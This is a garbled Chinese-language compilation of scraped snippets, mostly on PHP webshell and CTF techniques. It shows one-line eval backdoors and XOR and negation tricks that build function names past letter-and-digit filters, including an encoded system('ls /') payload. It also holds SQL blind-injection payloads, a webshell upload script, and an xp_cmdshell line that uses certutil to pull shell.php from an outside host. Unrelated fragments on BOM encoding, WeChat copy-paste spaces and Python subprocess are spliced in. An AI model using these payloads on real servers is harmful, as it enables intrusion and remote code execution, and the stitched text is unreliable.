在 PHP 中两个变量进行异或时,会先将字符串转换成 ASCII 值,再将 ASCII 值转换成二进制再进行异或,异或完又将结果从二进制转换成ASCII值,再转换成字符串。...的 ASCII 值是 63,对应的二进制值是 00111111 异或的二进制的值是 10000000 二进制对应的 ASCII 为 126,也就是字符 "~"。 例如非数字字母的 PHP 后门 <?...preg_match('/[a-z0-9]/is',$_GET['shell'])) { eval($_GET['shell']); } 思路 将非字母、数字的字符经过各种变换,最后能构造出 a-z...然后再利用 PHP 允许动态函数执行的特点,拼接处一个函数名,如 "assert",然后动态执行即可。 非字母、数字的字符异或出字母 不可打印字符,用 url 编码表示。 <?...非字母、数字的字符取反出字母 利用的是 UTF-8 编码的某个汉字,将其中的某个字符取出来,取反为字母。一个汉字的 utf8 是三个字节,{2} 表示第 3 个字节 <?
如果现在不能传入字母,也就意味着无法传入这些函数,无法执行函数的时候就没有办法去get shell。...如何通过非字母数字的东西去生成一些字母和数字,思路非常简单,但是到底怎么实现,方法很多,这也提到了中心思想就是将非字母数字的字符经过各种变换,能够构造出a到z的中的任意一个字符,其实换句话来说,如果你能去控制...我们给它做一个限制,比如说我这个限制成ASCII是64到91之间的,64到91就是到a到z,再一个96到122,我把所有字母都打印出来,最终会发现我们难点就在于不可控,就是字母无法输入,如果能输出字母,...第二种方法就是取反,这个非常奇特,我这里可以看到截图: 21-6.png 这里的话一个$a先做了一个3个字符的,比如说一个中文在jpk中,肯定是百分号,在UTF-8的时候就会变成百分号,所以说其实在一个和的时候...取反对其实还是对应二进制值的一个概念,就是说146,二进制的取反是01101101,十进制是109对应的ASCII是值是m所以说它其实这样去计算了之后,就会变成了109,这样的效果实现了一个从非字母非可显示字符的一个情况去转化出来
一、SQL注入漏洞 sql注入是就是通过把SQL语句插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。...and (select length(database()))=8 //求库名长度, and (select ascii(substr(database(),1,1)))=98 //求库名,求八次...and if(length(database())=8,sleep(5),1) //如果数据库名长度在8,这响应延时5秒 and if(ascii(substr(database(),1,1))=95...注:Eval()函数就可以把字符串按照PHP代码来执行,换句话说,就是可以动态地执行PHP代码,使用eval函数需要注意的是:输入的字符串必须是合法的PHP代码,且必须以分号结尾。...输入过滤:在数据存进数据库之前便对特殊的字符进行转义,方便简洁,顺便可以把SQL注入等其他漏洞一并检验。而缺点就是无法处理之前已经存在于数据库中的恶意代码。
ASCII码:63 二进制: 0011 1111 字符:~ ASCII码:126 二进制: 0111 1110 异或规则: 1 XOR...; }else{ eval($_GET['shell']); } ?...> 过滤了所有英文字母和数字,但是我们知道ASCII码中还有很多字母数字之外的字符,利用这些字符进行异或可以得到我们想要的字符 PS:取ASCII表种非字母数字的其他字符,要注意有些字符可能会影响整个语句执行...以及php7.0.9版本种使用,因为assert()的问题,并不是异或不能使用 注:PHP5低版本有些可能因为magic_quotes_gpc开启的关系导致无法利用 当过滤字符的范围没有那么大...=PHP<=7.0.9时,需要再执行一次构造出来的字符,所以参考上面那种异或拼接的方法 $_=(~'%9E%8C%8C%9A%8D%8B');$__='_'.
故本篇做一个webshell免杀的学习,主要是php的一句话 一、关于webshell 所谓webshell,就是向服务器端发送恶意代码写成的文件(即:shell),客户端通过远程连接,利用shell连接到服务器...否则,如果回显,只显示结果的最后一行 shell_exec : shell_exec()函数类似于exec(),但是,其整个输出结果为字符串 passthru : passthru()执行一个命令并返回原始格式的输出...但是对于PHP这种动态特性很多的语言,检测就比较吃力,AST是无法了解语义的。 其实这一部分有点类似于代码审计,核心问题就是找到那些可疑的函数。...> 8、特殊字符干扰 主要是能干扰到杀软的正则判断,还要代码能执行。可以自己fuzz,大概就是说各种回车、换行、null和空白字符等 举个例子: <?...但是一些语义分析的检测引擎就无法正确识别这些特殊字符,导致被绕过的现象。
标示,这东西依赖于shell解析,而很多shell出于兼容的考虑不检测BOM,所以加进BOM时shell会把它解释为某个普通字符输入导致破坏#!标示,这就麻烦了。...这时候出现了新的编码方式,unicode编码方式,想将编码统一,所以规定了每个字符对应的unicode码。 1、很多文件都是ascii编码,如果用unicode 太浪费。...windows总是自做聪明的做一些别人无法理解的事情!!!UTF-8是不需要BOM头的~~~!!...最近在学习用cocos2d-x,纯C++的编码,如果代码中有中文等的非ascii字符出现。发现会出错。代码是在mac 下用xcode 写的,放到windows 下用vs 编译。...或者用utf-8 不带bom格式,然后代码不要出现非ascii 127以后的字符。 关于说utf-8 不带bom 才是标准的,我想应该是带用个人情绪的说法吧。
意外发现,当代码从微信中复制粘贴到终端时,竟然出现了无法运行的情况。(详见下面的视频演示,大约是在第8分钟左右。。。) 这个小插曲不仅引起了我的好奇心,也激发了我探索和解析背后原因的欲望。...验证猜想 在shell查看 在shell环境下检查看看我们复制粘贴了什么鬼东西 可以看到是有一些诡异字符的。...这些字符出现在从微信或其他应用程序复制的文本中,是因为原始文本含有特定的控制字符或特殊的空格字符(如非断空格U+00A0,在shell环境显示为M-BM- ,通常不可见),这些在复制过程中没有被正确处理或转换...解决办法 解决方法有很多,在shell替换一下特殊字符或者在文本编辑器中使用查找和替换功能,将所有\xa0实例替换为常规空格(ASCII码为0x20),或者直接删除它们。...*按钮,这样你就可以使用正则表达式来查找字符。 输入要查找的正则表达式: 在查找输入框中输入 \xa0 这代表非断空格。
; 长度且不谈,先看看如何去绕过正则,可以写一个 Php 脚本自动去复制fuzzing,看看有哪些字符可用: <?...php $fuzzing_str_urldecode = array(); $fuzzing_str_urlencode = array(); for ($ascii...%BF%E7%94%A8%E6%95%B0%E5%AD%97%E5%AD%97%E6%AF%8D%E5%92%8C%E4%B8%8B%E5%88%92%E7%BA%BF%E5%86%99shell/...() generate_php_file("shell.south", "<?...,所以随便输入一串字符串便能返回该字符串与FLAG拼接的内容,官方给出的 payload 如下: 1;set sql_mode=pipes_as_concat;select 1 0x05 Cocktail's
布尔盲注可以使用的函数很多,例如可以使用length函数来判断需要查询的内容的字符长度,使用substring函数来读取字符串的每一个字符,使用ascii函数来转换为相应的ascii值,最后通过布尔运算来判断字符的...、User-Agent、XFF、Referer等 (3)防护 限制字符串输入的长度。...php版本升级,防止%00截断 对上传的文件进行重命名,防止被包含 对于需要动态包含的文件可以设置一个白名单,不读取非白名单的文件 【文件包含】文件包含漏洞知识总结v1.0 Part.8 命令执行漏洞...反序列化漏洞是指 应用程序对于用户输入的不可信数据进行了反序列化处理,使反序列化生成了非预期的对象,而在非预期对象产生的过程中,可能产生攻击行为的一种漏洞。...主要攻击目标为无法直接访问的内部系统,由此利用服务端发起攻击。 产生原因:服务端提供了从其他服务器应用获取数据的功能,但并没有对输入做限制。
(前一个ascii码要大于128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql会调用转义函数,将单引号变为',其中\的十六进制是%5c,mysql的GBK编码,会认为%df%5c是一个宽字节...当目录分隔符/被过滤后,可以使用liunx中的cd命令跳转到指定目录中,实现绕过 %0a 是 换行符 %09 是 TAB键 basename函数中如果传入的参数中出现了非ascii字符则会把它给丢弃...resource=shell.abc” 把后缀.abc当作php解析,然后shell.abc的内容用base64加密。...1.网页框之间输入:因为输入的Payload会在网址框显示,而网址框是没有长度限制的。...注意O和0输入的时候勿混淆 御剑扫描和dirsearch可以扫描后台文件 遇到显示一半的问题:可以用right,left,substr函数截取字符串。
所以我们的思路是,将非字母数字的字符经过各种转换,最后能构造出 a-z0-9 中的任意一个字符。...如果正则匹配过滤了字母和数字,那就可以使用两个不在正则匹配范围内的非字母非数字的字符进行异或,从而得到我们想要的字符串。 例如,我们异或 ?...那么或运算原理也是一样,如果正则匹配过滤了字母和数字,那就可以使用两个不在正则匹配范围内的非字母非数字的字符进行或运算,从而得到我们想要的字符串。 构造脚本 下面给出一个或运算绕过的脚本: <?...然后构造出我们的 Payload: (~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0); // system('ls /'); 测试效果如下: 构造脚本 直接运行以下脚本并输入提示内容即可生成...[@-[] 最后的 [@-[] 表示ASCII在 @ 和 [ 之间的字符,也就是大写字母,所以最后会执行的文件是 /tmp 文件夹下结尾是大写字母的文件。
所以我们的思路是,将非字母数字的字符经过各种转换,最后能构造出a-z0-9中的任意一个字符。...如果正则匹配过滤了字母和数字,那就可以使用两个不在正则匹配范围内的非字母非数字的字符进行异或,从而得到我们想要的字符串。 例如,我们异或?...那么或运算原理也是一样,如果正则匹配过滤了字母和数字,那就可以使用两个不在正则匹配范围内的非字母非数字的字符进行或运算,从而得到我们想要的字符串。 构造脚本 下面给出一个或运算绕过的脚本: <?...Payload: (~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0); // system('ls /'); 测试效果如下: 构造脚本 直接运行以下脚本并输入提示内容即可生成...[@-[] 最后的[@-[]表示ASCII在@和[之间的字符,也就是大写字母,所以最后会执行的文件是 /tmp 文件夹下结尾是大写字母的文件。
> 除了题目本身代码上的过滤以外,还部署了一个waf,这个waf规定了num变量只能是数字,根据php如上字符串解析的特性,可以进行绕过。 payload /calc.php?...(用于输入’ “都没有错误) ' or (ascii(substr((select database()) ,1,1))) = 115 # (用于输入’ “都没有错误) ") or ("...>") # shell = b"\x00\x00\x8a\x39\x8a\x39"+b"00"+b"eval($_POST[c]);"...>") python文件上传webshell import requests import base64 shell = b"\x00\x00\x8a\x39\x8a\x39"+b"00"+ base64...>") #shell = b"\x00\x00\x8a\x39\x8a\x39"+b"00"+ b"eval($_REQUEST[c]);
SQL漏洞类型 2.1 区分数字和字符串 数字上是不加单引号的如’2’+‘2’=‘22’而非’4’而2+2=4 2.2 内联SQL注入 sql注入主要是靠内联SQL来进行注入的and or 与或非的判断来进行内联...如果省略,则 mid() 函数返回剩余文本 select mid(database(),1)='testt'; 可进行单字符验证可进行全字符验证 5)函数ascii()返回字符串str的最左字符的数值。...ASCII()返回数值是从0到255;只会返回最左边字符的可以配合substr() 6)ord函数ORD() 函数返回字符串第一个字符的 ASCII 值。...注释符号:--空格,/ /内联注释,# Mysql–后面要加一个空格或者控制字符要不无法注释‘a’ ‘b’=‘ab’ 4.3 SQLSever 端口号:1433注释符号:--,/ /注释‘a’+‘b’=...--hex dump非ascii字符时,将其编码为16进制,收到后解码还原。 --output-dir=OUT.. 输出结果至文件。
这就需要我们去利用一些神奇的函数比如substr,ascii,length来猜测。 猜测什么呢?首先猜测数据库的长度,知道了长度,就去猜数据库每个字符。...发现需要利用到第二个输入框。 第二个输入框点击send之后就会显示successfully,但是这个它发送到哪里无法确定,这个网页用到Bootstrap,我不太熟悉。这可以肯定的是它有一个后端。...原来的邮件只支持7位ASCII字符集以内的字符,而MIME的提出则支持了其他的字符,甚至支持了图像、视频、音频等二进制文件。...file=shell.txt&ctfhub=system("cat /flag"); 直接在浏览器输入以上payload即可,至于那个空格 浏览器会自动进行url编码,成为%20。...php一句话木马用get shell,但是这个shell本质上是利用php里面的系统命令实现的,而且用户是www-data。
) 公共 模板 视频 图片 文档 下载 音乐 桌面 >>> result = subprocess.run('ls abcd', shell=True) ls: 无法访问abcd: 没有那个文件或目录...,一个ASCII字符可以用一个字节表示出来 所以bytes类型的数据,一个字节正好能表示成一个ASCII字符时,就显示成字符 汉字使用utf8编码,一个汉字需要占3字节。...非交互?),运行场景 思考程序有哪些功能,将这些功能写为函数,写出大体框架 编写程序主体。...计算机内部存储时,都是2进制的0和1 可以提前预定义好一串0/1的组合代表什么字符 ASCII是美国信息交换标准代码的简称,用7位表示字符 欧洲主要采用Latin-1,即ISO-8859-1字符集,共...8位 中国采用的是gbk / gb2313 / gb18030字符集 ISO国际标准化组织制定了万国码Unicode,utf8是其中的一种编码方案,它采用变长的编码方案,如果是英文字符,直接用1个字节表示
charset:表示字符集,即非ASCII字符所使用的字符编码集。这通常是一个标识字符集的文本字符串,例如UTF-8或ISO-8859-1。..."Q"表示Quoted-Printable编码,它将非ASCII字符编码为"="后跟两个十六进制数字的形式。 "B"表示Base64编码,它将数据编码为一系列ASCII字符。...encoded text:是实际编码后的文本,即包含非ASCII字符的原始文本的编码版本。 ?=:编码的结束标记,表示编码的结束。...举个栗子: 如果将shell.jsp通过Quoted-Printable编码方式为=?utf-8?Q?=73=68=65=6c=6c=2e=6a=73=70?...= 如果将shell.jsp通过Base64编码方式为=?utf-8?B?c2hlbGwuanNw?
,如Id、年龄和页码等; 字符型注入:输入参数为字符串型(有单引号和双引号之分)时,如姓名、职业、住址等; 搜索型注入:注入点在搜索框中,一般搜索SQL为: like “%关键字%”; 延时注入:使用延时函数方式...()和char() ascii(char):把char这个字符转为ascii码 char(ascii_int):和ascii()的作用相反,将ascii码转字符 布尔盲注 攻击者通过发起不同请求观察响应内容的相同与否...php:// 输入输出流 PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。...XSS漏洞防范 对输入参数进行过滤、转义 设置HTTP only A.PHP直接输出html的,可以采用以下的方法进行过滤: 1.htmlspecialchars函数 把预定义的字符 "无法识别,向左 xxx ->无法识别,向左 php ->发现后缀是 php,交给 php 处理这个文件 漏洞检测 本地访问127.0.0.1/1.php.ha ,观察文件是否能被解析成php
; } } PHP: <?php echo "hello world!"; ?...显然ASCII码无法将世界上的各种文字和符号全部表示,所以,就需要新出一种可以代表所有字符和符号的编码,即:Unicode Unicode(统一码、万国码、单一码)是一种在计算机上使用的字符编码。...注:此处说的的是最少2个字节,可能更多 UTF-8,是对Unicode编码的压缩和优化,他不再使用最少使用2个字节,而是将所有的字符和符号进行分类:ascii码中的内容用1个字节保存、欧洲的字符用2个字节保存.../usr/bin/env pythonprint '你好, 世界' 报错:SyntaxError: Non-ASCII character ,ascli码无法表示中文,那怎么办?...你不能拼接字符串和字节包,也无法在字节包里搜索字符串(反之亦然),也不能将字符串传入参数为字节包的函数(反之亦然)。这是件好事。
2的1个字符 select ascii('a') #查询给定字符串的ascii值 select len('string') #查询给定字符串的长度...Server获取权限的奇淫技巧 利用前提: 目标网站注入支持堆叠注入 当前权限是SA权限 使用sqlmap的 –os-shell 无法获取到权限 这里很多人就会问了,既然是SA权限,不是可以直接利用xp_cmdshell...id=1 -D test -T hack --dump 将一句话木马写入目标网站根目录,并命名为shell.php。...1;exec master..xp_cmdshell 'certutil -urlcache -split -f http://x.x.x.x/shell.php C:\phpstudy\www\shell2....php';-- 连接下载的shell2.php木马即可!
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
实时音视频
即时通信 IM
对象存储
